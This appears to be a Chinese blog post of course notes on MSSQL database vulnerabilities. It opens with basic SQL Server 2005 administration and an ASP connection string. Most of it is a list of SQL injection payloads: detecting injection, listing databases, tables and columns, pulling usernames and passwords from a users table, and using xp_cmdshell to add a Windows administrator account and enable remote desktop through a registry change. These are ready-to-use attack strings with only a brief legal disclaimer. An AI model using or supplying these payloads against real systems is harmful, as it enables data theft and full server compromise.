某教程学习笔记(一):08、MSSQL数据库漏洞

简介: 某教程学习笔记(一):08、MSSQL数据库漏洞

一、MSSQL介绍


MSSQL商业,性能好,易用,企业支持好,有很多精度要高的类型,学校、政府、在线办公、游戏、棋牌等部门可能会用。


端口:1433


后缀:.mdf/.ldf


sa权限:数据库操作,文件管理,命令执行,注册表读取等,相当于win系统system


db权限:文件管理,数据库操作等,相当于win系统adminnstrators


public权限:数据库操作,相当于win系统guest


二、SQL SERVER 2005


1、安装成功,输入账号密码登陆

0a2653c851af460fa595bd959398a8f1.png

2、master、model、msdb、tempdb这四个数据库是系统自带数据库

0eacb84100b54626af849e6b562bf92a.png

3、右击数据库,新建数据库,自动生成两个文件

2d65d23f6d4748949b924e4057485923.png

4、双击展开新建的数据库,右击表,添加表,输入列名和数据类型,保存

2e9b90b2ca334476abebe75bafe6eeaa.png

5、右击新建的表,打开表,然后就可以添加我们的数据了

4cebaac233b3433da32a72337a77fc60.png

6、删除数据库,需要先右击要删除的数据库,选择任务,再选择分离,然后再进目录删除数据库


7、添加外来的数据库,先把数据库文件放进目录,然后右击数据数据库,选择附加


8、备份数据库,选择要备份的数据库右击,选择生成脚本,选择为服务器版本编写脚本(修改为自己要用的版本)


9、还原数据库,将导出的脚本里面的内容复制到sql语句,运行,就会和重新生成一个数据库,里面的内容和备份数据库的内容一样。


三、代码调用


<%


cctt = “provier=sqloledb;source=local;uid=sa;pwd=**;database=database1”


Set conn = Server.Createobject(“ADODB.Connection”)


conn.open cctt


%>


provider后面的不用管,照写; source后面的可以是ip地址,这里我用的是本地的;sa是内置的用户,它的密码是你在安装的时候设置的; database后面是你要连接的数据库的名称.


四、判断注入


and 1=1 返回正常


and 1=2 返回错误,说明有注入


and user>0 返回正常,说明是sqlserver注入


and (select count(*)from sysobjects)>0 mssql 返回正常,说明是sqlserver注入


猜数表名


and( select count()from[表名])>0


猜字段


and( select Count(字段名)from[表名])>0


猜字段中记录长度


and(select top1len(字段名)from表名)>0


猜字段的asc值( access)


and( (select top1 asc(mid(字段名,1,1)from表名)>0


猜字段的ascii值(mssql)


and( select top1 unicode(substring(字段名1,1)from表名)>0


测试权限结构( mssql)


and 1=(select IS_SRVROLEMEMBER(‘sysadmin’));-- //判断是否是系统管理员


and 1=(select IS_SRVROLEMEMBERC(‘serveradmin’));–


and 1=(select IS_SRVROLEMEMBERC(‘setupadmin’));–


and 1=(select IS_SRVROLEMEMBERC(‘securityadmin’));–


and 1=(select IS_SRVROLEMEMBER(‘diskadmin’));–


and 1=(select IS_SRVROLEMEMBER(‘bulkadmin’);–


and 1=(select is_srvrolemember(‘db_owner’));–//判断是否是库权限


and 1=(select is_srvrolemember(‘public’));–//判断是否是pubilc权限


and 1=convert(int,db_name())或1=(select db_name())//当前数据库名


and 1=(select @@servername)//本地服务名


and 1=(select HAS_DBACCESS(‘master’))//判断是否有库读取权限


猜版本号


id=1 and 1=(select @@version)


id=@@version


猜数据库名称


id=1 and 1=(select db_name())


id=db_name()


获取所有数据库


id=1 and 1=(select name from master…sysdatabases for xml path)


获取第一个用户数据库


id=1 and 1=(select top 1 name from master…sysdatabases where dbid>4) #数据库是从第五个开始排的


获取下一个数据库


id=1 and 1=(select top 1 name from master…sysdatabases where dbid>4 and name <>‘上面查出来的数据库’)


或者


id=1 and 1=(select top 1 name from master…sysdatabases where dbid>5) #一次类推


获取所有表


id=1 and 1=(select name from sysobjects for xml path)


获取第一张表


id=1 and 1=(select top 1 name from sysobjects where xtype=‘u’)


获取下一张表


id=1 and 1=(select top 1 name from sysobjects where xtype=‘u’ and name <>‘上面查出来的表’)


获取表users第一列列名uname


id=1 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name=‘users’))


获取表users第二列列名upass


id=1 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name=‘users’) and name <> ‘uname’)


依次往后爆破


获取表users第一个用户名


?id=1 and 1=(select top 1 uname from users)


获取密码


?id=1 and 1=(select top 1 upass from users)


五、利用xp_cmdshell添加用户


id=1 ;exec master…xp_cmdshell ‘net user username password /add’


id=1 ;exec master… xp_cmdshell ‘net localgroup administrators username /add’ 添加到管理员组


六、开启3389端口


id=1 ;exec master…xp_cmdshell ‘sc config termservice start=auto’


;exec master…xp_cmdshell ‘net start termservice’


;exec master…xp_cmdshell ‘reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /vfDenyTSConnections /t REG_DWORD/d 0x0/f’


禁止非法,后果自负

目录
相关文章
|
7月前
|
缓存 Java 应用服务中间件
Spring Boot配置优化:Tomcat+数据库+缓存+日志,全场景教程
本文详解Spring Boot十大核心配置优化技巧,涵盖Tomcat连接池、数据库连接池、Jackson时区、日志管理、缓存策略、异步线程池等关键配置,结合代码示例与通俗解释,助你轻松掌握高并发场景下的性能调优方法,适用于实际项目落地。
1297 5
|
存储 关系型数据库 分布式数据库
PolarDB 开源基础教程系列 8 数据库生态
PolarDB是一款开源的云原生分布式数据库,源自阿里云商业产品。为降低使用门槛,PolarDB携手伙伴打造了完整的开源生态,涵盖操作系统、芯片、存储、集成管控、监控、审计、开发者工具、数据同步、超融合计算、ISV软件、开源插件、人才培养、社区合作及大型用户合作等领域。通过这些合作伙伴,PolarDB提供了丰富的功能和服务,支持多种硬件和软件环境,满足不同用户的需求。更多信息请访问[PolarDB开源官方网站](https://openpolardb.com/home)。
685 4
|
关系型数据库 MySQL API
新手教程:数据库操作(使用PDO或MySQLi扩展)
本文为新手介绍如何使用PDO和MySQLi扩展连接与操作MySQL数据库。PDO更现代灵活,支持多种数据库,适合大多数应用;MySQLi提供面向过程和面向对象两种API,适合直接控制数据库操作。教程涵盖安装配置、创建连接、执行查询(查询、插入、更新、删除)及错误处理等内容。希望这篇教程能帮助你快速上手PHP中的数据库操作!
397 32
|
存储 机器学习/深度学习 监控
南大通用GBase 8s数据库onbar基础使用教程
数据备份与恢复是确保数据安全和业务连续性的关键。onbar作为GBase 8s数据库的备份工具,需配合存储管理器使用,通过配置BAR_BSALIB_PATH等参数,实现数据的备份与恢复。本文详细介绍了onbar的配置、备份、恢复及监控流程,帮助数据库管理员构建高效的数据保护方案。
|
存储 SQL 关系型数据库
【入门级教程】MySQL:从零开始的数据库之旅
本教程面向零基础用户,采用通俗易懂的语言和丰富的示例,帮助你快速掌握MySQL的基础知识和操作技巧。内容涵盖SQL语言基础(SELECT、INSERT、UPDATE、DELETE等常用语句)、使用索引提高查询效率、存储过程等。适合学生、开发者及数据库爱好者。
673 0
【入门级教程】MySQL:从零开始的数据库之旅
|
SQL NoSQL MongoDB
一款基于分布式文件存储的数据库MongoDB的介绍及基本使用教程
一款基于分布式文件存储的数据库MongoDB的介绍及基本使用教程
461 0
|
存储 NoSQL API
.NET NoSQL 嵌入式数据库 LiteDB 使用教程
.NET NoSQL 嵌入式数据库 LiteDB 使用教程~
702 0
|
7月前
|
关系型数据库 MySQL 分布式数据库
阿里云PolarDB云原生数据库收费价格:MySQL和PostgreSQL详细介绍
阿里云PolarDB兼容MySQL、PostgreSQL及Oracle语法,支持集中式与分布式架构。标准版2核4G年费1116元起,企业版最高性能达4核16G,支持HTAP与多级高可用,广泛应用于金融、政务、互联网等领域,TCO成本降低50%。
|
7月前
|
SQL 关系型数据库 MySQL
Mysql数据恢复—Mysql数据库delete删除后数据恢复案例
本地服务器,操作系统为windows server。服务器上部署mysql单实例,innodb引擎,独立表空间。未进行数据库备份,未开启binlog。 人为误操作使用Delete命令删除数据时未添加where子句,导致全表数据被删除。删除后未对该表进行任何操作。需要恢复误删除的数据。 在本案例中的mysql数据库未进行备份,也未开启binlog日志,无法直接还原数据库。
|
7月前
|
关系型数据库 MySQL 数据库
阿里云数据库RDS费用价格:MySQL、SQL Server、PostgreSQL和MariaDB引擎收费标准
阿里云RDS数据库支持MySQL、SQL Server、PostgreSQL、MariaDB,多种引擎优惠上线!MySQL倚天版88元/年,SQL Server 2核4G仅299元/年,PostgreSQL 227元/年起。高可用、可弹性伸缩,安全稳定。详情见官网活动页。
1234 152
下一篇
开通oss服务